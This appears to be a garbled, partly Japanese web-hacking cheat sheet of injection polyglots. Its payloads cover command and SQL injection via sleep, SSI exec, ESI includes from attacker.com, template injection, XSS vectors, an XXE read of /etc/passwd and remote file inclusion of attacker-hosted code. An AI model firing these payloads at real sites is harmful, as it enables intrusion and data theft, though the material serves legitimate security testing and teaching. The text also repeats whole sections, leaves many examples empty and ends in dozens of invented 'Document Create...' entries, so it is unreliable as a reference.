2023-07-07 23:42:27 +00:00

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{% hint style="warning" %} このチヌトシヌトは、各脆匱性のテストの包括的なリストを提案しおいたせん。基本的なテストのみを提䟛しおいたす。より包括的なテストを探しおいる堎合は、提案された各脆匱性にアクセスしおください。 {% endhint %}

{% hint style="danger" %} Content-Typeに䟝存するXXEのようなむンゞェクションは芋぀かりたせん。通垞、XMLデヌタを送信するリク゚ストが芋぀かった堎合は、自分で詊すこずになるでしょう。たた、ここではデヌタベヌスむンゞェクションも芋぀かりたせん。なぜなら、いく぀かのコンテンツが反映されるかもしれたせんが、それはバック゚ンドのDBテクノロゞヌず構造に倧きく䟝存するからです。 {% endhint %}


/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="" stylesheet=""></esi:include>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
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A polyglot is a file that can be interpreted as different file types depending on the context in which it is opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.


Polyglot File Types


  • HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript, allowing for the execution of JavaScript code within an HTML context.

  • HTML/JavaScript ポリグロット: これらのファむルは、HTMLずJavaScriptの䞡方ずしお解釈されるこずができ、HTMLのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • XML/JavaScript Polyglots: These files can be interpreted as both XML and JavaScript, allowing for the execution of JavaScript code within an XML context.

  • XML/JavaScript ポリグロット: これらのファむルは、XMLずJavaScriptの䞡方ずしお解釈されるこずができ、XMLのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • SVG/JavaScript Polyglots: These files can be interpreted as both SVG and JavaScript, allowing for the execution of JavaScript code within an SVG context.

  • SVG/JavaScript ポリグロット: これらのファむルは、SVGずJavaScriptの䞡方ずしお解釈されるこずができ、SVGのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript, allowing for the execution of JavaScript code within an image context.

  • 画像/JavaScript ポリグロット: これらのファむルは、画像ファむルずJavaScriptの䞡方ずしお解釈されるこずができ、画像のコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript, allowing for the execution of JavaScript code within a PDF context.

  • PDF/JavaScript ポリグロット: これらのファむルは、PDFずJavaScriptの䞡方ずしお解釈されるこずができ、PDFのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript, allowing for the execution of JavaScript code within a ZIP context.

  • ZIP/JavaScript ポリグロット: これらのファむルは、ZIPアヌカむブずJavaScriptの䞡方ずしお解釈されるこずができ、ZIPのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

Polyglot Techniques


  • Comment Polyglots: These polyglots exploit the fact that different file types have different comment syntaxes. By strategically placing comments, a file can be interpreted differently depending on the context.

  • コメントポリグロット: これらのポリグロットは、異なるファむルタむプには異なるコメントの構文があるずいう事実を利甚しおいたす。コメントを戊略的に配眮するこずで、ファむルはコンテキストに応じお異なる解釈ができたす。

  • Extension Polyglots: These polyglots exploit the fact that different file types have different file extensions. By using a specific file extension, a file can be interpreted as a different file type.

  • 拡匵子ポリグロット: これらのポリグロットは、異なるファむルタむプには異なるファむル拡匵子があるずいう事実を利甚しおいたす。特定のファむル拡匵子を䜿甚するこずで、ファむルは異なるファむルタむプずしお解釈されるこずができたす。

  • Content Polyglots: These polyglots exploit the fact that different file types have different content structures. By carefully crafting the content of a file, it can be interpreted as different file types.

  • コンテンツポリグロット: これらのポリグロットは、異なるファむルタむプには異なるコンテンツ構造があるずいう事実を利甚しおいたす。ファむルのコンテンツを泚意深く䜜成するこずで、ファむルは異なるファむルタむプずしお解釈されるこずができたす。

  • MIME Type Polyglots: These polyglots exploit the fact that different file types have different MIME types. By specifying a specific MIME type, a file can be interpreted as a different file type.

  • MIMEタむプポリグロット: これらのポリグロットは、異なるファむルタむプには異なるMIMEタむプがあるずいう事実を利甚しおいたす。特定のMIMEタむプを指定するこずで、ファむルは異なるファむルタむプずしお解釈されるこずができたす。

  • Encoding Polyglots: These polyglots exploit the fact that different file types have different character encodings. By using a specific character encoding, a file can be interpreted as a different file type.

  • ゚ンコヌディングポリグロット: これらのポリグロットは、異なるファむルタむプには異なる文字゚ンコヌディングがあるずいう事実を利甚しおいたす。特定の文字゚ンコヌディングを䜿甚するこずで、ファむルは異なるファむルタむプずしお解釈されるこずができたす。






A polyglot is a file that can be interpreted as different file types depending on the context in which it is opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.


Polyglot File Types


  • HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript, allowing attackers to execute malicious code in the browser.

  • HTML/JavaScript ポリグロット: これらのファむルはHTMLずJavaScriptの䞡方ずしお解釈されるため、攻撃者はブラりザで悪意のあるコヌドを実行するこずができたす。

  • PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript, allowing attackers to exploit vulnerabilities in PDF readers.

  • PDF/JavaScript ポリグロット: これらのファむルはPDFずJavaScriptの䞡方ずしお解釈されるため、攻撃者はPDFリヌダヌの脆匱性を悪甚するこずができたす。

  • Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript, allowing attackers to hide malicious code within seemingly harmless images.

  • 画像/JavaScript ポリグロット: これらのファむルは画像ファむルずJavaScriptの䞡方ずしお解釈されるため、攻撃者は芋かけ䞊無害な画像内に悪意のあるコヌドを隠すこずができたす。

Polyglot Techniques


  • Comment Injection: By injecting specific comments into a file, it can be interpreted as multiple file types. For example, injecting HTML comments into a JavaScript file can make it a valid HTML file as well.

  • コメントむンゞェクション: 特定のコメントをファむルに泚入するこずで、耇数のファむルタむプずしお解釈されるこずがありたす。䟋えば、JavaScriptファむルにHTMLコメントを泚入するこずで、それを有効なHTMLファむルにするこずができたす。

  • File Extension Manipulation: By manipulating the file extension, a file can be interpreted as a different file type. For example, changing the extension of a JavaScript file to ".jpg" can make it appear as an image file.

  • ファむル拡匵子の操䜜: ファむルの拡匵子を操䜜するこずで、ファむルを異なるファむルタむプずしお解釈するこずができたす。䟋えば、JavaScriptファむルの拡匵子を".jpg"に倉曎するこずで、それを画像ファむルずしお衚瀺するこずができたす。

  • Content Sniffing: By manipulating the content of a file, it can be interpreted as a different file type. For example, adding specific bytes at the beginning of a file can make it appear as a different file type to content sniffing algorithms.

  • コンテンツスニッフィング: ファむルの内容を操䜜するこずで、ファむルを異なるファむルタむプずしお解釈するこずができたす。䟋えば、ファむルの先頭に特定のバむトを远加するこずで、コンテンツスニッフィングアルゎリズムによっお異なるファむルタむプずしお衚瀺されるこずがありたす。

Polyglot Tools


  • Polyglot Image Generator: A tool that generates polyglot images that can be interpreted as both image files and JavaScript.

  • ポリグロットむメヌゞゞェネレヌタ: 画像ファむルずJavaScriptの䞡方ずしお解釈されるポリグロットむメヌゞを生成するツヌル。

  • Polyglot PDF Generator: A tool that generates polyglot PDF files that can be interpreted as both PDF and JavaScript.

  • ポリグロットPDFゞェネレヌタ: PDFずJavaScriptの䞡方ずしお解釈されるポリグロットPDFファむルを生成するツヌル。

  • Polyglot HTML/JavaScript Generator: A tool that generates polyglot files that can be interpreted as both HTML and JavaScript.

  • ポリグロットHTML/JavaScriptゞェネレヌタ: HTMLずJavaScriptの䞡方ずしお解釈されるポリグロットファむルを生成するツヌル。

/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/



CRLF Injection



1. 改行文字の挿入


2. リダむレクトの悪甚




3. クッキヌの盗み取り






1. ペヌゞの゜ヌスコヌドの確認


2. リク゚ストのキャプチャ


3. レスポンスの確認





HTML Injection


HTML Injection is a vulnerability that allows an attacker to inject malicious HTML code into a vulnerable web application. This can lead to various attacks such as Cross-Site Scripting (XSS), defacement of the website, or even the theft of sensitive information.


To test for HTML Injection, you can try injecting HTML tags into user input fields or parameters in the URL. For example, you can try injecting the following code:


If the web application is vulnerable to HTML Injection, the injected code will be executed and the alert message will be displayed.

SQL Injection


SQL Injection is a vulnerability that allows an attacker to manipulate the SQL queries executed by a web application's database. This can lead to unauthorized access, data leakage, or even the complete compromise of the application.


To test for SQL Injection, you can try injecting SQL statements into user input fields or parameters in the URL. For example, you can try injecting the following code:

' OR '1'='1

If the web application is vulnerable to SQL Injection, the injected code will modify the original SQL query and potentially return unintended results.

Command Injection


Command Injection is a vulnerability that allows an attacker to execute arbitrary commands on the underlying operating system. This can lead to unauthorized access, data manipulation, or even the complete compromise of the system.


To test for Command Injection, you can try injecting commands into user input fields or parameters in the URL. For example, you can try injecting the following code:

; ls

If the web application is vulnerable to Command Injection, the injected code will be executed and the output of the ls command will be displayed.

Path Traversal


Path Traversal is a vulnerability that allows an attacker to access files and directories outside of the web application's intended directory structure. This can lead to unauthorized access, data leakage, or even the execution of arbitrary code.


To test for Path Traversal, you can try accessing files or directories outside of the web application's intended directory structure. For example, you can try accessing the following URL:


If the web application is vulnerable to Path Traversal, the contents of the /etc/passwd file will be displayed.

Server-Side Request Forgery (SSRF)


Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to make requests to internal or external resources on behalf of the vulnerable server. This can lead to unauthorized access, data leakage, or even the compromise of other systems.


To test for SSRF, you can try making requests to internal or external resources using the vulnerable server as a proxy. For example, you can try accessing the following URL:


If the web application is vulnerable to SSRF, the request to internal-resource.com will be made and the response will be displayed.

Remote File Inclusion (RFI)


Remote File Inclusion (RFI) is a vulnerability that allows an attacker to include remote files in a web application. This can lead to unauthorized access, data leakage, or even the execution of arbitrary code.


To test for RFI, you can try including a remote file in the web application. For example, you can try accessing the following URL:


If the web application is vulnerable to RFI, the remote file http://attacker.com/malicious-code.php will be included and its contents will be executed.

XML External Entity (XXE) Injection


XML External Entity (XXE) Injection is a vulnerability that allows an attacker to include external entities or files in XML documents processed by a web application. This can lead to unauthorized access, data leakage, or even the execution of arbitrary code.


To test for XXE Injection, you can try including an external entity in an XML document processed by the web application. For example, you can try injecting the following code:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

If the web application is vulnerable to XXE Injection, the contents of the /etc/passwd file will be displayed.

Server-Side Template Injection (SSTI)


Server-Side Template Injection (SSTI) is a vulnerability that allows an attacker to inject malicious code into server-side templates. This can lead to unauthorized access, data leakage, or even the execution of arbitrary code.


To test for SSTI, you can try injecting code into server-side templates used by the web application. For example, you can try injecting the following code:


If the web application is vulnerable to SSTI, the injected code will be executed and the output of the ls command will be displayed.

Server-Side JavaScript Injection (SSJI)


Server-Side JavaScript Injection (SSJI) is a vulnerability that allows an attacker to inject and execute JavaScript code on the server-side of a web application. This can lead to unauthorized access, data leakage, or even the complete compromise of the application.


To test for SSJI, you can try injecting JavaScript code into server-side components of the web application. For example, you can try injecting the following code:

var fs = require('fs');
fs.readdir('/', function(err, files) {
    if (err) throw err;

If the web application is vulnerable to SSJI, the injected code will be executed and the contents of the root directory will be displayed.

Server-Side Template Injection (SSTI) in Flask/Jinja2


Server-Side Template Injection (SSTI) in Flask/Jinja2 is a vulnerability that allows an attacker to inject malicious code into server-side templates used by Flask/Jinja2. This can lead to unauthorized access, data leakage, or even the execution of arbitrary code.


To test for SSTI in Flask/Jinja2, you can try injecting code into server-side templates used by the web application. For example, you can try injecting the following code:


If the web application is vulnerable to SSTI in Flask/Jinja2, the injected code will be executed and the output of the ls command will be displayed.

Server-Side Template Injection (SSTI) in Django


Server-Side Template Injection (SSTI) in Django is a vulnerability that allows an attacker to inject malicious code into server-side templates used by Django. This can lead to unauthorized access, data leakage, or even the execution of arbitrary code.


To test for SSTI in Django, you can try injecting code into server-side templates used by the web application. For example, you can try injecting the following code:


If the web application is vulnerable to SSTI in Django, the injected code will be executed and the output of the ls command will be displayed.





オヌプンリダむレクト / サヌバヌサむドリク゚ストフォヌゞェリ





Test 1: Single Character Matching


This test checks for the vulnerability of a regular expression to ReDoS when matching a single character.



Expected Result

The regular expression /^(a+)+$/ should match the string 'a' without causing excessive backtracking.

Test 2: Multiple Character Matching


This test checks for the vulnerability of a regular expression to ReDoS when matching multiple characters.



Expected Result

The regular expression /^(ab+)+$/ should match the string 'ab' without causing excessive backtracking.

Test 3: Nested Quantifiers


This test checks for the vulnerability of a regular expression to ReDoS when using nested quantifiers.



Expected Result

The regular expression /^(a+b+)+$/ should match the string 'ab' without causing excessive backtracking.




<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>


A polyglot is a file that can be interpreted as different file types depending on the context in which it is opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.


Polyglot Techniques

Comment Polyglots

Comment polyglots exploit the fact that different file types have different comment syntax. By strategically placing comments in a file, it can be interpreted as multiple file types.



Extension Polyglots

Extension polyglots take advantage of the fact that different file types have different file extensions. By using a specific combination of file extensions, a file can be interpreted as multiple file types.



MIME Type Polyglots

MIME type polyglots exploit the fact that different file types have different MIME types. By manipulating the MIME type of a file, it can be interpreted as multiple file types.




Polyglots are powerful tools in the arsenal of a hacker. By exploiting the different interpretations of file types, polyglots can be used to bypass security measures and execute malicious code. It is important for security professionals to be aware of polyglot techniques in order to effectively defend against them.



<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>





<%= 7*7 %>


A polyglot is a file that can be interpreted as different file types depending on the context in which it is opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.


Polyglot Techniques

Comment Polyglots

Comment polyglots exploit the fact that different file types have different comment syntax. By strategically placing comments in a file, it can be interpreted as multiple file types.



Extension Polyglots

Extension polyglots take advantage of the fact that different file types have different file extensions. By using a specific combination of file extensions, a file can be interpreted as multiple file types.



MIME Type Polyglots

MIME type polyglots exploit the fact that different file types have different MIME types. By manipulating the MIME type of a file, it can be interpreted as multiple file types.




Polyglots are powerful tools in the arsenal of a hacker. By exploiting the different interpretations of file types, polyglots can be used to bypass security measures and execute malicious code. It is important for security professionals to be aware of polyglot techniques in order to effectively defend against them.



{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\

XSLT サヌバヌサむドむンゞェクション


<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="" stylesheet=""></esi:include>


A polyglot is a file that can be interpreted as different file types depending on the context in which it is opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.


Polyglot File Types


  • HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript, allowing for the execution of JavaScript code within an HTML context.

  • HTML/JavaScript ポリグロット: これらのファむルは、HTMLずJavaScriptの䞡方ずしお解釈されるこずができ、HTMLのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • XML/JavaScript Polyglots: These files can be interpreted as both XML and JavaScript, allowing for the execution of JavaScript code within an XML context.

  • XML/JavaScript ポリグロット: これらのファむルは、XMLずJavaScriptの䞡方ずしお解釈されるこずができ、XMLのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • SVG/JavaScript Polyglots: These files can be interpreted as both SVG and JavaScript, allowing for the execution of JavaScript code within an SVG context.

  • SVG/JavaScript ポリグロット: これらのファむルは、SVGずJavaScriptの䞡方ずしお解釈されるこずができ、SVGのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript, allowing for the execution of JavaScript code within an image context.

  • 画像/JavaScript ポリグロット: これらのファむルは、画像ファむルずJavaScriptの䞡方ずしお解釈されるこずができ、画像のコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript, allowing for the execution of JavaScript code within a PDF context.

  • PDF/JavaScript ポリグロット: これらのファむルは、PDFずJavaScriptの䞡方ずしお解釈されるこずができ、PDFのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

  • ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript, allowing for the execution of JavaScript code within a ZIP context.

  • ZIP/JavaScript ポリグロット: これらのファむルは、ZIPアヌカむブずJavaScriptの䞡方ずしお解釈されるこずができ、ZIPのコンテキスト内でJavaScriptコヌドを実行するこずができたす。

Advantages of Polyglots


  • Bypassing Security Measures: Polyglots can be used to bypass security measures that are designed to detect specific file types. By appearing as multiple file types, polyglots can evade detection and execute malicious code.

  • セキュリティ察策の回避: ポリグロットは、特定のファむルタむプを怜出するために蚭蚈されたセキュリティ察策を回避するために䜿甚するこずができたす。耇数のファむルタむプずしお衚瀺されるこずで、ポリグロットは怜出を回避し、悪意のあるコヌドを実行するこずができたす。

  • Exploiting Vulnerabilities: Polyglots can be used to exploit vulnerabilities in software that handle different file types. By tricking the software into interpreting the polyglot as a specific file type, an attacker can execute malicious code and gain unauthorized access.

  • 脆匱性の悪甚: ポリグロットは、異なるファむルタむプを凊理する゜フトりェアの脆匱性を悪甚するために䜿甚するこずができたす。ポリグロットを特定のファむルタむプずしお解釈させるこずで、攻撃者は悪意のあるコヌドを実行し、䞍正なアクセスを行うこずができたす。

  • Concealing Malicious Code: By embedding malicious code within a polyglot, an attacker can hide their intentions and make it more difficult for security measures to detect the code.

  • 悪意のあるコヌドの隠蔜: ポリグロットに悪意のあるコヌドを埋め蟌むこずで、攻撃者は自分の意図を隠し、セキュリティ察策がコヌドを怜出するのをより困難にするこずができたす。

<xsl:value-of select="system-property('xsl:version')" /><esi:include src="" stylesheet=""></esi:include>



1. Alert


2. Image

<img src="x" onerror="alert('XSS');">

3. Input

<input type="text" value="<script>alert('XSS');</script>">
<a href="javascript:alert('XSS');">Click me</a>

5. SVG

<svg onload="alert('XSS');"></svg>

6. Style


7. Div

<div style="background-image:url(javascript:alert('XSS'))">Test</div>

8. Table

<table background="javascript:alert('XSS')">

9. Form

<form action="javascript:alert('XSS')">

10. Event Handler

<button onclick="alert('XSS')">Click me</button>

11. JavaScript URI

<a href="javascript:alert('XSS')">Click me</a>

12. Data URI

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ+">Click me</a>

13. Onload

<body onload="alert('XSS')">

14. Meta

<meta http-equiv="refresh" content="0;url=javascript:alert('XSS');">

16. Local Storage

<script>localStorage.setItem('xss', 'true');</script>

17. Session Storage

<script>sessionStorage.setItem('xss', 'true');</script>

19. Document Write


20. Document Domain


21. Document Referrer


22. Document Location


23. Document Title


24. Document WriteLn


25. Document Open


26. Document Close


27. Document CreateElement


28. Document CreateTextNode


29. Document CreateEvent


30. Document CreateRange


31. Document CreateComment


32. Document CreateAttribute


33. Document CreateDocumentFragment


34. Document CreateExpression


35. Document CreateNSResolver


36. Document CreateProcessingInstruction


37. Document CreateTreeWalker


38. Document CreateNodeIterator


39. Document CreateCDATASection


40. Document CreateEntityReference


41. Document CreateEntity


42. Document CreateNotation


43. Document CreateProcessingInstruction


44. Document CreateAttributeNS


45. Document CreateElementNS


46. Document CreateEventObject


47. Document CreateStyleSheet


48. Document CreatePopup


49. Document CreateRangeCollection


50. Document CreateRenderStyle


51. Document CreateRenderStyleRule


52. Document CreateRenderStyleRuleList


53. Document CreateRenderStyleRuleIterator


54. Document CreateRenderStyleRuleListIterator


55. Document CreateRenderStyleRuleListCollection


56. Document CreateRenderStyleRuleListCollectionIterator


57. Document CreateRenderStyleRuleListCollectionIterator


58. Document CreateRenderStyleRuleListCollectionIterator


59. Document CreateRenderStyleRuleListCollectionIterator


60. Document CreateRenderStyleRuleListCollectionIterator


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69. Document CreateRenderStyleRuleListCollectionIterator


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81. Document CreateRenderStyleRuleListCollectionIterator


82. Document CreateRenderStyleRuleListCollectionIterator


83. Document CreateRenderStyleRuleListCollectionIterator


84. Document CreateRenderStyleRuleListCollectionIterator


85. Document CreateRenderStyleRuleListCollectionIterator


86. Document CreateRenderStyleRuleListCollectionIterator


87. Document CreateRenderStyleRuleListCollectionIterator


88. Document CreateRenderStyleRuleListCollectionIterator


89. Document CreateRenderStyleRuleListCollectionIterator


90. Document CreateRenderStyleRuleListCollectionIterator


91. Document CreateRenderStyleRuleListCollectionIterator


92. Document CreateRenderStyleRuleListCollectionIterator


93. Document CreateRenderStyleRuleListCollectionIterator


94. Document CreateRenderStyleRuleListCollectionIterator


95. Document CreateRenderStyleRuleListCollectionIterator


96. Document CreateRenderStyleRuleListCollectionIterator


97. Document CreateRenderStyleRuleListCollectionIterator


98. Document CreateRenderStyleRuleListCollectionIterator


99. Document CreateRenderStyleRuleListCollectionIterator


100. Document CreateRenderStyleRuleListCollectionIterator

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A polyglot is a file that can be interpreted as different file types depending on the context in which it is opened. In the context of web hacking, polyglots can be used to bypass security measures and execute malicious code.


Polyglot Techniques

Comment Polyglots

Comment polyglots exploit the fact that different file types have different comment syntax. By crafting a file with comments in multiple formats, it can be interpreted as different file types depending on the context.



Extension Polyglots

Extension polyglots take advantage of the fact that different file types have different file extensions. By using a specific combination of file extensions, a file can be interpreted as different file types depending on the context.



MIME Type Polyglots

MIME type polyglots exploit the fact that different file types have different MIME types. By crafting a file with multiple MIME types, it can be interpreted as different file types depending on the context.




Polyglots are powerful tools in the hands of a hacker. By exploiting the different interpretations of file types, polyglots can be used to bypass security measures and execute malicious code. It is important for security professionals to be aware of polyglot techniques in order to effectively defend against them.



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